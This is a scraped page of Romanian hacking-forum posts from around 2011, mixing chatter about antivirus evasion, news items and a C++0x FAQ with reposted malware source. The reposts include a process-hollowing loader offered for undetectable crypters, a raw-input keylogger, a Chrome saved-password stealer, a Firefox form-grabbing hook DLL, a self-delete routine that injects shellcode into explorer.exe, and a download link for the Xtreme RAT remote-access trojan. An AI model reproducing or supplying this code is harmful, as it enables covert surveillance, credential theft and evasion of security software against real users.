Nytro

Probabil tehnologie anti-rootkit. Ma uitam la videoclipuri de pe Sysinternals si am vazut cam cum functioneaza. Verifica fisierele dintr-un folder folosind API-urile clasice, de exemplu. Apoi aceeasi verificare folosind acces brut la sistemul de fisiere NTFS. Daca lipseste ceva, clar, e ascuns. Asta ar fi o idee. Oricum, solutii sunt multe dar foarte complicate. Se poate verifica de SSDT hooks, e complicat. Vreau ca pe viitor sa ma axez tocmai pe acest domeniu, am inceput sa citesc Windows Internals 5th Edition. Momentan nu stiu foarte multe nici eu...

Sa tii un executabil de exemplu, ca resursa, ca sectiune sau orice altceva, si acel fisier sa nu fie detectabil e banal. Eu pus si simplu adaugam "1" la fiecare octet, si 255 il faceam 0 si nu mai era detectabil. Partea detectabila e loader-ul, codul care incarca executabilul in memorie, sau dropper-ul, partea de cod in care stub-ul se autociteste sau se copiaza pe nu stiu unde, sau "Anti-****"-urile... Asta e greu. Pe ideea cryptarii sectiunii de cod a unui executabil s-ar putea face niste incercari, nu ar mai fi trebuit incarcat in memorie, doar la executie sa se modifice sectiunea de cod, entrypointul poate sa fie acelasi, dar trebuie adaugat codul de decryptare acolo, sectiunea trebuie sa fie MEM_WRITE, sunt cateva lucruri care trebuie facute, dar merge.

Da, este calea mai "1337". Mai dificila, fara documentatie pentru functie... Mai interesanta si mai atragatoare. +1

Vazusem un videoclip facut de muts (Mati Ahroni) bazat pe aceeasi tehnica. Nu stiu ca de eficienta e, e posibil sa fie detectata de scanarile heuristice moderne. Am vrut sa fac un packer pe aceasta idee, poate chiar o sa fac, dar am niste chestii pe cap vreo doua saptamani.

Daca stiam ca o sa apara in articol, scriam si noi ceva mai concret si mai elegant. Oricum, nu suntem noi "hackeri", dar suntem persoane din domeniu... Si da, imi place articolul, e "altfel".

O sa te razgandeti cu timpul, cand vei vedea ca exista si alte lucruri in afara de ce faci in liceu... Tu ai enumerat doar materie de liceu.

C++0x - the next ISO C++ standard This document is written by and maintained by Bjarne Stroustrup. Constructive comments, correction, references, and suggestions are of course most welcome. Currently, I'm working to improve completeness and clean up the references. C++0x is the next ISO C++ standard. Currently a draft is available for comments. The previous (and current) standard is often referred to as C++98 or C++03; the differences between C++98 and C++03 are so few and so technical that they ought not concern users. The final committee draft standard is currently (March 2010) being voted on by the national standards bodies. After that there will be more work before all comments have been addressed and the ISO bureaucracy satisfied. At the current stage of the proceedings, no features (even very minor ones) are expected to be added or removed. The name "C++0x" is a relict of the days where I and others, hoped for a C++08 or C++09. However, to minimize confusion, I'll keep referring to the upcoming C++ standard with the feature set defined here as C++0x. Think of 'x' as hexadecimal (most likely 'B', i.e. C++11). If you have comments on C++0x, please find some member of your national standards body -- or a member of any standards body -- to send your comments to. That's now the only way and will ensure that the committee doesn't have to deal with many very similar comment. Remember, the committee consists of volunteers with limited time and resources. All official documents relating to C++0x can be found at the ISO C++ committee's website. The official name of the committee is SC22 WG21. Caveat: This FAQ will be under construction for quite a while. Comments, questions, references, corrections, and suggestions welcome. Purpose The purpose of this C++0x FAQ is To give an overview of the new facilities (language features and standard libraries) offered by C++0x in addition to what is provided by the previous version of the ISO C++ standard. To give an idea of the aims of the ISO C++ standards effort. To present a user's view of the new facilities To provide references to allow for a more in depth study of features. To name many of the individuals who contributed (mostly as authors of the reports they wrote for the committee). The standard is not written by a faceless organization. Please note that the purpose of this FAQ is not to provide comprehensive discussion of individual features or a detailed explanation of how to use them. The aim is to give simple examples to demonstrate what C++0x has to offer (plus references). My ideal is "max one page per feature" independently of how complex a feature is. Details can often be found in the references. Lists of questions Here are some high-level questions What do you think of C++0x? When will C++0x be a formal standard? When will compilers implement C++0x? When will the new standard libraries be available? What new language features will C++0x provide? (a list); see also the questions below What new standard libraries will C++0x provide? (a list); see also the questions below What were the aims of the C++0x effort? What specific design aims guided the committee? Where can I find the committee papers? Where can I find academic and technical papers about C++0x? (a list) Where else can I read about C++0x? (a list) Are there any videos about C++0x? (a list) Is C++0x hard to learn? How does the committee operate? Who is on the committee? In which order should an implementer provide C++0x features? Will there be a C++1x? What happened to "concepts? Are there any features you don't like? Questions about individual language features can be found here: __cplusplus alignments attributes atomic operations auto (type deduction from initializer) C99 features enum class (scoped and strongly typed enums) copying and rethrowing exceptions constant expressions (generalized and guaranteed;constexpr) decltype defaulted and deleted functions (control of defaults) delegating constructors Dynamic Initialization and Destruction with Concurrency explicit conversion operators extended integer types extern templates for statement; see range for statement suffix return type syntax (extended function declaration syntax) in-class member initializers inherited constructors initializer lists (uniform and general initialization) lambdas local classes as template arguments long long integers (at least 64 bits) memory model move semantics; see rvalue references Inline namespace Preventing narrowing null pointer (nullptr) PODs (generalized) range for statement raw string literals right-angle brackets rvalue references Simple SFINAE rule static (compile-time) assertions (static_assert) template alias template typedef; see template alias thread-local storage (thread_local) unicode characters Uniform initialization syntax and semantics unions (generalized) user-defined literals variadic templates I often borrow examples from the proposals. In those cases: Thanks to the proposal authors. Many of the examples are borrowed from my own talks and papers. Questions about individual standard library facilities can be found here: abandoning a process Improvements to algorithms array async() atomic operations Condition variables Improvements to containers function and bind forward_list a singly-liked list future and promise garbage collection ABI hash_tables; see unordered_map metaprogramming and type traits Mutual exclusion random number generators regex a regular expression library scoped allocators shared_ptr smart pointers; see shared_ptr, weak_ptr, and unique_ptr threads Time utilities tuple unique_ptr unordered_map weak_ptr system error Below are questions to specific questions as indexed above. Tutorial: http://www2.research.att.com/~bs/C++0xFAQ.html

Ceva imi spune ca nu mai dureaza mult pana primesti ban...

Qubes – sistem de operare Open Source construit pentru a fi sigur Andrei Av?d?nei, 13.06.2011 Qubes este un sistem de operare Open Source ce dispune de o arhitectur? special creat? pentru a oferi o experien?? de navigare desktop sigur?. Este bazat pe Xen, X Window System ?i Linux, putând rula aproape orice tip de aplica?ie Linux ?i utiliza majoritatea driverelor Linux. Autorii acestuia promit c? in viitor vor include ?i suportul pentru rularea aplica?iilor Windows. Qubes, aflat în varianta beta, are o abordare de tipul “Securitate prin izolare”. Pentru a face asta, Qubes folose?te ca principiu de baz? virtualizarea, având posibilitatea s? izoleze diverse programe unele de altele sau chiar diverse componente ale sistemului, precum re?eaua, subsistemul de stocare ?amd. Asta incearc? s? previn? afectarea integrit??ii sistemului de problemele ap?rute într-un subsistem. Qubes are câteva profile create pentru ma?inile virtuale (cunoscute ca AppVMs) precum “personal”, “work”, “shopping”, “bank” sau “random” ?i permite rularea aplica?iilor ca ?i cum s-ar executa pe ma?ina local?. Mai suport? ?i copierea ?i mutarea sigur? a unei aplica?ii dintr-o ma?in? virtual? în alta. Mai multe detalii despre arhitectura sistemului de operare g?si?i aici iar câteva fotografii cu acesta aici. Sursa: Qubes - sistem de operare Open Source construit pentru a fi sigur | WorldIT

Spanish police website hit by Anonymous hackers 13 June 2011 Last updated at 10:50 GMT The website of Spain's national police force has been briefly knocked offline by hacker collective Anonymous. The attack on the site was carried out in retaliation for the arrest of three Spanish men the police claimed were 'core' members of the group. The hackers managed to keep Pgina Oficial del Cuerpo Nacional de Polica offline for about an hour from 2130 GMT on 12 June. Spanish authorities would not confirm that Anonymous was behind the attack, saying only that the site was offline. However, a statement was posted on a website linked to Anonymous, claimed responsibility for the hack, which it called #OpPolicia. The group said it had used a distributed denial of service attack (DDoS) which bombards a target website with so much data that it becomes overwhelmed. A spokesman for the Spanish police said the cause of the outage had not yet been established. "A website can collapse if too many people try to access it at once. I cannot confirm the link with the Anonymous group," said the spokesman. In its statement, Anonymous said the DDoS attack was a "direct response to the Friday arrests of three individuals alleged to be associated with acts of cyber civil disobedience attributed to Anonymous." The group said DDoS attacks were a legitimate form of peaceful protest. Some of its members are thought to have carried out similar attacks on Turkish government websites to protest against net censorship. Anonymous also denied that the men arrested were part of the "core" of Spanish members of the group. "They did not arrest any core group, because we don't have a core group," said Anonymous in its statement. Sursa: BBC News - Spanish police website hit by Anonymous hackers

Blind Sql Injection – Regular Expressions Attack Authors: // Removed on request Index Why blind sql injection?......................................................................................................................3 How blind sql injection can be used?...................................................................................................3 Testing vulnerability (MySQL - MSSQL):........................................................................................3 Time attack (MySQL)...........................................................................................................................3 Time attack (MSSQL)..........................................................................................................................4 Regexp attack's methodology................................................................................................................5 Finding table name with Regexp attack (MySQL)...........................................................................5 Finding table name with Regexp attack (MSSQL)...........................................................................6 Exporting a value with Regexp attack (MySQL).............................................................................7 Exporting a value with Regexp attack (MSSQL).............................................................................7 Time considerations.............................................................................................................................8 Bypassing filters..................................................................................................................................9 Real life example.................................................................................................................................9 Conclusions.........................................................................................................................................9 Download: http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf

Cursul 9 lipseste, nu stiu de ce... Nu e nici la "sursa".

Interesant. Dar le mut la programare, sunt mai utile acolo.

Sunt materialele de curs ale unui profesor (cu care am facut si eu, dar nu criptografie) de la Universitatea Bucuresti, Facultatea de Matematica-Informatica: Adrian Atanasiu Cursul de Criptografie (semestrul 1) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Cursul 10 Cursul 11 Cursul 12 Cursul 13 Cursul de Criptografie (semestrul 2) Cursul 1 Cursul 2 Cursul 3 Cursul 4 Cursul 5 Cursul 6 Cursul 7 Cursul 8 Cursul 9 Sursa: http://www.galaxyng.com/adrian_atanasiu/cript.htm PS: Puteti cauta cartile dumnealui: - Securitatea informatiei - Vol. I - Criptografie - Securitatea informatiei - Vol. II - Protocoale de securitate - Arhitectura sistemelor de calcul Toate sunt de la editura InfoData cred.

Da, era intr-o revista articolul, de acolo nu am stat sa il citesc, dar postat si aranjat il voi citi, thanks.

Da, dar nu e tocmai genial sa iti dai seama ca e vorba de o baza de data SQLite. O poti deschide cu SQLite Explorer, sau nu stiu ce utilitar pentru astfel de baze de date si poti vedea structura, apoi "SELECT * FROM logins" si uite parolele. Daca deschizi acel fisier "C:\Users\Ionut\AppData\Local\Google\Chrome\User Data\Default\Login Data" cu Notepad, primele caractere sunt: "SQLite format 3", apoi gasesti si: "CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL,ssl_valid INTEGER NOT NULL,preferred INTEGER NOT NULL,date_created INTEGER NOT NULL,blacklisted_by_user INTEGER NOT NULL,scheme INTEGER NOT NULL,UNIQUE (origin_url, username_element, username_value, password_element, submit_element, signon_realm))" care spune tot ce iti trebuie.

PS: Ideea e urmatoarea: baiatul de la Jurnalul, pe langa faptul ca nu e deloc paralel cu domeniul, a colaborat in nenumarate randuri cu Hackersblog. Deci e o legatura intre RST si Jurnalul. Cum spunea si el: daca scrie cineva un articol, fara sa va intrebe pe voi, atot-cunoscatorii, nu e bine. Daca va intreaba, tot nu e bine. Deci sunteti ratati. Ontopic: Probabil e vorba de un simplu SQL Injection. Ce vreau sa spun: in ziua de azi sunt foarte multe persoane care "stiu" SQL Injection si foarte multe dintre ele, pe langa aerele de hackeri mondiali doresc sa se faca remarcati. Si da, acest tip de atac, pe langa faptul ca nu e foarte dificil, poate avea rezultate frumusele: de la acces la datele din baza de date la root pe serverul pe care il ataca. Probabil e vorba de cineva care incearca sa se faca remarcat. Nu cred ca e vorba de ceva mai complex, daca se baga vreo organizatie guvernamentala probabil ar fi aparut si alte probleme, politice de exemplu. Si atacul nu ar fi fost simplu, probabil ar fi scanat mai intai intreaga retea a FMI-ului, sa obtina cat mai multe informatii, posibil sa se fi folosit de persoane din interior... Eu raman la ideea ca un pusti cu atitudine de "hacker" s-a gandit sa caute SQL Injection (sau LFI, XSS... ) intr-un site mare, o fi cautat pe Google in functie de un dork si ce a gasit? FMI...

[c++] Run Program From Memory And Not File Author: Galco void RunFromMemory(char* pImage,char* pPath) { DWORD dwWritten = 0; DWORD dwHeader = 0; DWORD dwImageSize = 0; DWORD dwSectionCount = 0; DWORD dwSectionSize = 0; DWORD firstSection = 0; DWORD previousProtection = 0; DWORD jmpSize = 0; IMAGE_NT_HEADERS INH; IMAGE_DOS_HEADER IDH; IMAGE_SECTION_HEADER Sections[1000]; PROCESS_INFORMATION peProcessInformation; STARTUPINFO peStartUpInformation; CONTEXT pContext; char* pMemory; char* pFile; memcpy(&IDH,pImage,sizeof(IDH)); memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH)); dwImageSize = INH.OptionalHeader.SizeOfImage; pMemory = (char*)malloc(dwImageSize); memset(pMemory,0,dwImageSize); pFile = pMemory; dwHeader = INH.OptionalHeader.SizeOfHeaders; firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS)); memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections); memcpy(pFile,pImage,dwHeader); if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = INH.OptionalHeader.SizeOfHeaders; } else { jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++) { jmpSize = 0; dwSectionSize = Sections[dwSectionCount].SizeOfRawData; memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize); if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0) { jmpSize = Sections[dwSectionCount].Misc.VirtualSize; } else { jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment; jmpSize += 1; jmpSize *= INH.OptionalHeader.SectionAlignment; } pFile = (char*)((DWORD)pFile + jmpSize); } memset(&peStartUpInformation,0,sizeof(STARTUPINFO)); memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION)); memset(&pContext,0,sizeof(CONTEXT)); peStartUpInformation.cb = sizeof(peStartUpInformation); if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation)) { hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); pContext.ContextFlags = CONTEXT_FULL; GetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten); WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten); pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(peProcessInformation.hThread,&pContext); VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0); ResumeThread(peProcessInformation.hThread); } free(pMemory); } This function will run a process based on it's memory instead of running a process from a file. Meaning, you can use this in crypters to have fud runtime. You can basically load an exe as a resource into your code and run it as a process like this: int main(int argc,char* argv[]) { HGLOBAL hResData; HRSRC hResInfo; void *pvRes; DWORD dwSize; char* lpMemory; HMODULE hModule = GetModuleHandle(NULL); if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL) &&((hResData = LoadResource(hModule, hResInfo)) != NULL) &&((pvRes = LockResource(hResData)) != NULL)) { dwSize = SizeofResource(hModule, hResInfo); lpMemory = (char*)malloc (dwSize); memset(lpMemory,0,dwSize); memcpy (lpMemory, pvRes, dwSize); RunFromMemory(lpMemory,argv[0]); } } The program running the process must have the same image base or else it will not work. By the way, ignore these two lines: hideProcess(peProcessInformation.dwProcessId); startHook(peProcessInformation.hProcess); I forgot to edit them out when I posted the function. Lol. Dont ask what they were used for. Sursa: [c++] Run Program From Memory And Not File - rohitab.com - Forums

[C] GetRawInputData() keylogger Author: defsanguje Just an another way to implement an user-mode keylogger. The code registers a raw input device that receives mouse and keyboard input. GetRawInputData() API was introduced in Windows XP to access input devices (joysticks, microphones etc) at low level. More info can be found here. #define _WIN32_WINNT 0x0501 #include <windows.h> // Definitions int LogKey(HANDLE hLog, UINT vKey); LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow); // Globals const char g_szClassName[] = "klgClass"; // Window procedure of our message-only window LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { static HANDLE hLog; UINT dwSize; RAWINPUTDEVICE rid; RAWINPUT *buffer; switch(msg) { case WM_CREATE: // Register a raw input device to capture keyboard input rid.usUsagePage = 0x01; rid.usUsage = 0x06; rid.dwFlags = RIDEV_INPUTSINK; rid.hwndTarget = hwnd; if(!RegisterRawInputDevices(&rid, 1, sizeof(RAWINPUTDEVICE))) { MessageBox(NULL, "Registering raw input device failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return -1; } // open log.txt hLog = CreateFile("log.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if(hLog == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Creating log.txt failed!", "Error", MB_ICONEXCLAMATION|MB_OK); return -1; } // append SetFilePointer(hLog, 0, NULL, FILE_END); break; case WM_INPUT: // request size of the raw input buffer to dwSize GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER)); // allocate buffer for input data buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize); if(GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, &dwSize, sizeof(RAWINPUTHEADER))) { // if this is keyboard message and WM_KEYDOWN, log the key if(buffer->header.dwType == RIM_TYPEKEYBOARD && buffer->data.keyboard.Message == WM_KEYDOWN) { if(LogKey(hLog, buffer->data.keyboard.VKey) == -1) DestroyWindow(hwnd); } } // free the buffer HeapFree(GetProcessHeap(), 0, buffer); break; case WM_DESTROY: if(hLog != INVALID_HANDLE_VALUE) CloseHandle(hLog); PostQuitMessage(0); break; default: return DefWindowProc(hwnd, msg, wParam, lParam); } return 0; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { WNDCLASSEX wc; HWND hwnd; MSG msg; // register window class ZeroMemory(&wc, sizeof(WNDCLASSEX)); wc.cbSize = sizeof(WNDCLASSEX); wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = g_szClassName; if(!RegisterClassEx(&wc)) { MessageBox(NULL, "Window Registration Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // create message-only window hwnd = CreateWindowEx( 0, g_szClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, hInstance, NULL ); if(!hwnd) { MessageBox(NULL, "Window Creation Failed!", "Error!", MB_ICONEXCLAMATION|MB_OK); return 0; } // the message loop while(GetMessage(&msg, NULL, 0, 0) > 0) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; } int LogKey(HANDLE hLog, UINT vKey) { DWORD dwWritten; BYTE lpKeyboard[256]; char szKey[32]; WORD wKey; char buf[32]; int len; // Convert virtual-key to ascii GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK); GetKeyboardState(lpKeyboard); len = 0; switch(vKey) { case VK_BACK: len = wsprintf(buf, "[BP]"); break; case VK_RETURN: len = 2; strcpy(buf, "\r\n"); break; case VK_SHIFT: break; default: if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1) len = wsprintf(buf, "%c", (char)wKey); else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0) len = wsprintf(buf, "[%s]", szKey); break; } // Write buf into the log if(len > 0) { if(!WriteFile(hLog, buf, len, &dwWritten, NULL)) return -1; } return 0; } Sursa: [C]GetRawInputData() keylogger

[C] Google Chrome Password Recovery Author: Sacrificial /* * Google Chrome Password Recovery * * Coded by Sacrificial * Sacrificial2010@hotmail.com * */ void GetGoogleChrome() { char szPath[MAX_PATH]; sqlite3 *lpDatabase; sqlite3_stmt *lpStatement; const char *lpTail; char *szURL, *szUsername, *szPassword; DATA_BLOB DataIn, DataOut; SHGetSpecialFolderPath(0, szPath, 0x1C, 0); strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Login Data"); if(GetFileAttributes(szPath) != 0xFFFFFFFF) { sqlite3_open(szPath, &lpDatabase); sqlite3_prepare_v2(lpDatabase, "SELECT * FROM logins", 20, &lpStatement, &lpTail); do { DataIn.pbData = (LPBYTE)sqlite3_column_blob(lpStatement, 5); DataIn.cbData = sqlite3_column_bytes(lpStatement, 5); if(CryptUnprotectData(&DataIn, 0, 0, 0, 0, 8, &DataOut)) { szURL = (char*)sqlite3_column_text(lpStatement, 0); szUsername = (char*)sqlite3_column_text(lpStatement, 3); szPassword = (char*)DataOut.pbData; szPassword[DataOut.cbData] = '\0'; // Do whatever you want with em; } } while(sqlite3_step(lpStatement) == SQLITE_ROW); } } Note: Its not the best coding, but it works, and like I said its old. It requires the SQLite libraries. For Chrome 6 and up the path is "\\Google\\Chrome\\User Data\\Default\\Login Data" For Chrome 5 and below the path is "\\Google\\Chrome\\User Data\\Default\\Web Data" Would be nice if you gave credits when using this code. Enjoy Sursa: [sNIPPET] Google Chrome Password Recovery

[C] FireFox Formgrabber Author: datemme Heres an example for a Firefox Formgrabber: dllmain: #include "hookdll.cpp" BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: Funktion(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } HookDll.cpp : // hookdll.cpp : Definiert die exportierten Funktionen für die DLL-Anwendung. #include <iostream> #include <fstream> using namespace std; #pragma once #include <windows.h> #include <prio.h> #pragma comment (lib, "nspr4.lib") BYTE hook[6]; DWORD HookFunction(LPCSTR lpModule, LPCSTR lpFuncName, LPVOID lpFunction, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); BYTE jmp[6] = { 0xe9, //jmp 0x00, 0x00, 0x00, 0x00, //address 0xc3 }; //retn ReadProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0); DWORD dwCalc = ((DWORD)lpFunction - dwAddr - 5); //((to)-(from)-5) memcpy(&jmp[1], &dwCalc, 4); //build the jmp WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, jmp, 6, 0); return dwAddr; } BOOL UnHookFunction(LPCSTR lpModule, LPCSTR lpFuncName, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0)) return TRUE; return FALSE; } int WriteLog(const char * Filename,char * Text) { ofstream File; //Names File as ofstream (for output to file) //Closes file File.open(Filename,ios::app); //Reopens file to append, if you just used ios::out again, it would erase everything and rewrite the file File << Text; //Outputs to file File.close(); //Closes opened file SetFileAttributes( Filename , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NORMAL ); return 1; } PRInt32 cPR_Write( PRFileDesc *fd, const void *buf, PRInt32 amount) { UnHookFunction("nspr4.dll", "PR_Write", hook); PRInt32 hResult = PR_Write(fd,buf,amount); if(strncmp((LPCSTR)buf,"POST",lstrlen("POST"))==0){WriteLog("test.txt",(char*)buf);}; if(strncmp((LPCSTR)buf,"GET",lstrlen("GET"))==0){WriteLog("test.txt",(char*)buf);}; HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); return hResult; } extern "C" void __declspec(dllexport) Funktion() { HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); } //U need to download Gecko SDK (google it) and set the additional Include path und Lib path in project details //vc++ 2008 compiled in multibyte mode //inject it in FF and have Fun !!! //can be very usefull if u "forgot" your password on a website //advantage compared to Pw-Grabbers and Keylogges: logs manualy inserted passwords and saved passwords both //you can ofcourse filter for special tags with slightly modification datemme Sursa: FireFox Formgrabber

[C] Self Delete - explorer.exe injection Author: __v00d00 // __v00d00 __ OpenSC.ws __ // A process cannot simply delete itself // At some point, code will have to run in the context of another process // People typically run a batch file in the background - but this can be noticable // I inject an assembly stub into explorer.exe - it loops on DeleteFile // Once the file is deleted the thread exits. // I also have the thread sleep so that explorer.exe doesn't start eating up too many resources. // Then the thread kills itself. void selfDestruct() { BYTE stub[] = { // "\xcc" // debug int 3 "\x68" "\xDE\xAD\xBE\xAF" // push argument (pointer to path) "\xB8" "\xDE\xAD\xBA\xBE" // mov eax DeleteFile "\xFF\xD0" // call eax "\x50" // push eax "\x68" "\x00\x01\x00\x00" // push 100 "\xB8" "\xDE\xAD\xBE\xAF" // mov eax Sleep "\xFF\xD0" // call eax "\x58" // pop eax "\x85\xc0" // test eax, eax "\x74\xe2" // jnz to start "\x6A" "\x00" // push 0 "\xB8" "\xDE\xAD\xBE\xAF" // mov eax RtlExitUserThread "\xFF\xD0" // call eax }; HANDLE hProc, hThread; DWORD pid; LPVOID pRemotePathStr, pRemoteStub; char ourPath[MAX_PATH]; HMODULE hKernel; HMODULE hNtdll; DWORD dwDeleteFile; DWORD dwSleep; DWORD dwExitThread; GetModuleFileName(NULL, ourPath, MAX_PATH); pid = GetPidByName("explorer.exe"); if(!pid) return; hKernel = GetModuleHandle("kernel32.dll"); if(!hKernel) return; hNtdll = GetModuleHandle("ntdll.dll"); if(!hNtdll) return; dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA"); dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep"); dwExitThread = (DWORD)GetProcAddress(hNtdll, "RtlExitUserThread"); hProc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, false, pid); if (hProc == NULL) return; pRemotePathStr = VirtualAllocEx(hProc, NULL, strlen(ourPath) + 1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pRemotePathStr == NULL) return; if (!WriteProcessMemory(hProc, pRemotePathStr, ourPath, strlen(ourPath) + 1, NULL)) return; pRemoteStub = VirtualAllocEx(hProc, NULL, sizeof(stub), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pRemoteStub == NULL) return; memcpy(stub + 1, &pRemotePathStr, 4); memcpy(stub + 6, &dwDeleteFile, 4); memcpy(stub + 19, &dwSleep, 4); memcpy(stub + 33, &dwExitThread, 4); if (!WriteProcessMemory(hProc, pRemoteStub, stub, sizeof(stub), NULL)) return; hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteStub, NULL, 0, 0); if (!hThread) return; DelStartUp(); // remove our startup key exit(1); } Sursa: Self Delete

Xtreme RAT v2.8 RAT - Remote Administration Tool This is a tool that allow you to control your computer from anywhere in world. With full support to Unicode language, you will never have problem using this software. Here you can find new updates, informations and tutorials about this software. Here some images v2.8: Version 2.8 (04/06/2011) Here some changes since last version: Please, update your servers. - Close window options after select your language and others settings. - Sometimes using Filemanager, when you try to upload some files, the folder name appear with '\\'. Now was corrected. - Corrected a bug, using file manager, when the user select a file with "0 bytes". - Some options on MSN functions was deleted until update to use new windows live messenger. - Added a better handle errors when servers are disconnected. - Changed injection method. - Corrected a bug when try to close options window (UPnP). - Changed GUI. - Corrected high CPU usage that occurs sometimes. - Corrected some bugs using remote shell function. - Added a new column on main list: Account Type. Download: http://sites.google.com/site/nxtremerat/XtremeRATv2.8.3.zip?attredirects=0 Password: 123 Sursa: Xtreme RAT v2.8

A few current Ebooks: NMAP_cookbook.pdf iPhone Programming - The Big Nerd Ranch Guide.pdf hello-android_3e.pdf Practical Packet Analysis_ Using Wireshark to Solve Real-World Network Problems.pdf The IDA PRO Book.pdf Disassembling Code - IDA Pro And SoftICE.chm Identifying Malicious Code Through Reverse Engineering.pdf Reversing Secrets of Reverse Engineering.pdf Download: http://hotfile.com/dl/116717781/27ecc69/Ebooks.zip.html Sursa: A few current ebooks

Spam, nu trebuie sa aduci tot exploit-db-ul aici, doar ce e important...